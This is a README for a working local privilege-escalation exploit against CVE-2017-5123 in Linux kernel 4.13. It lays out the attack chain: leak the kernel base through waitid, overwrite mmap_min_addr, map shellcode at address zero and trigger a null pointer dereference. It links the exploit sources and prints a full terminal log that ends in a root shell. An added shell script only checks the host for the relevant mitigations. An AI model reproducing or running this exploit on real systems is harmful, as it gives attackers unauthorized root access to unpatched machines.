# Exploit for CVE-2017-5123
## Steps
* Compile the kernel with the null pointer dereference module
* Run a VM (QEMU) with the custom kernel (QEMU does not enable SMEP by default)
* Find the addresses of mmap_min_addr/dac_mmap_min_addr by reading "/proc/kallsyms" or via the waitid infoleak
* Overwrite mmap_min_addr/dac_mmap_min_addr by calling waitid (CVE-2017-5123), which disables the mmap_min_addr floor
* Map the shellcode at 0x00 and trigger the kernel null pointer dereference to gain privileges
* Run a shell as root
## Can & can't
* Kernel version: 4.13
* Needs: ("/proc/kallsyms" readable | vmlinux) & (a kernel null pointer dereference)
* Bypasses: mmap_min_addr, KASLR
* Does not bypass: SMEP
* Exploits: kernel null pointer dereference
* Result: a root shell
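As an added example (not part of this PoC or any of the sources it is derived from), a POSIX shell check that reports whether the preconditions and mitigations listed above are present on a host: the mmap_min_addr floor, whether /proc/kallsyms leaks addresses to unprivileged users, whether the CPU exposes SMEP, and whether the kernel is in the 4.13 series this README targets. The function names and the "ok/weak" style labels are my own; each check is a pure function of its input so it can also be run on constructed values.

```sh
#!/bin/sh
# Added hardening check (not the PoC's own code): reports whether the host
# state this README relies on is present. Each check takes its input as an
# argument; report() feeds it the live values from /proc and uname.

# A non-zero mmap_min_addr keeps page 0 unmappable for unprivileged users.
mmap_min_addr_state() {
    [ "${1:-0}" -gt 0 ] 2>/dev/null && echo ok || echo weak
}

# Takes one "addr T symbol" line from /proc/kallsyms. With kptr_restrict>=1
# an unprivileged reader sees zeroed addresses; a real address means the
# kernel text layout (and with it KASLR) is exposed. A text (T) symbol is
# used because absolute (A) per-cpu symbols legitimately sit at 0.
kallsyms_state() {
    case "$1" in
        0000000000000000*) echo hidden ;;
        "")                echo unreadable ;;
        *)                 echo exposed ;;
    esac
}

# SMEP (a CPU flag in /proc/cpuinfo) stops the kernel from executing
# user-mapped code such as shellcode placed at 0x00; this PoC cannot bypass it.
smep_state() {
    case " $1 " in
        *" smep "*) echo present ;;
        *)          echo absent ;;
    esac
}

# Only the 4.13 series this README targets is flagged; whether a given point
# release already carries the waitid fix must be checked against its changelog.
kernel_series() {
    case "$1" in
        4.13|4.13.*) echo targeted ;;
        *)           echo other ;;
    esac
}

# Live report against the current host (missing/unreadable files read as empty).
report() {
    echo "kernel $(uname -r): $(kernel_series "$(uname -r | cut -d- -f1)")"
    echo "mmap_min_addr: $(mmap_min_addr_state "$(cat /proc/sys/vm/mmap_min_addr 2>/dev/null)")"
    echo "kallsyms: $(kallsyms_state "$(grep -m1 ' T ' /proc/kallsyms 2>/dev/null)")"
    echo "smep: $(smep_state "$(grep -m1 '^flags' /proc/cpuinfo 2>/dev/null | cut -d: -f2)")"
}

report
```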
## Source files
* [disable_map_min_addr.c](disable_map_min_addr.c) for steps 3-4
* [null_poiter_exploit.c](null_poiter_exploit.c) for steps 5-6
* [test.c](test.c) for step 1
## Result
My exploit succeeded on Debian 9/QEMU.
NOTE: QEMU does not enable SMEP by default, and my exploit can't bypass SMEP. T_T
```
bins@debian:~$ id
uid=1000(bins) gid=1000(bins) groups=1000(bins),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
bins@debian:~$ cat /proc/sys/vm/mmap_min_addr
1024
bins@debian:~$ ./disable_map_min_addr
[+] Leak size=144 bytes
[+] Leak point: 0x7fff62dbbb00
[+] Leak point: 0x7fff62dbbb08
[+] Leak point: 0x7fff62dbbb10
[+] Leak point: 0x7fff62dbbb18
[+] Leak point: 0x7fff62dbbb20
[+] Leak point: 0x7fff62dbbb28
[+] Leak point: 0x7fff62dbbb30
[+] Leak point: 0x7fff62dbbb38
[+] Leak point: 0x7fff62dbbb40
[+] Find startup_64...
[+] Found startup_64 at ffffffffa2a00000
[+] Got kernel base: 0xffffffffa2a00000
[+] Got mmap_min_addr: 0xffffffffa3b01de8
[+] Got dac_mmap_min_addr: 0xffffffffa388e810
[+] Overwriting map_min_addr...
[+] Overwriting dac_mmap_min_addr...
[+] map_min_addr disabled!
bins@debian:~$ cat /proc/sys/vm/mmap_min_addr
0
bins@debian:~$ ./null_poiter_exploit
[+] Find prepare_kernel_cred...
[+] Found prepare_kernel_cred at ffffffffa2a77300
[+] Find commit_creds...
[+] Found commit_creds at ffffffffa2a76f80
Got commit_creds:0xffffffffa2a76f80,prepare_kernel_cred0xffffffffa2a77300
[+] Try to allocat 0x00000000...
[+] Allocation success !
[+]Start touch kernel null point
[+] Root shell success !! :)
# id
uid=0(root) gid=0(root) groups=0(root)
#
```
## Other
All the source is modified from the work of spender, @XeR_0x2A, @chaign_c and up201407890:
* [spender bypass KASLR PoC](https://grsecurity.net/~spender/exploits/wait_for_kaslr_to_be_effective.c)
* [up201407890 disable SELinux PoC](http://seclists.org/oss-sec/2017/q4/134)
* [@XeR_0x2A & @chaign_c map shellcode to 0x00](https://www.exploit-db.com/exploits/43029/)
* [vulnerability analysis in Chinese](https://github.com/Bins94/Kernel_Anatomy/tree/master/kernel_4.13_waitid_poc)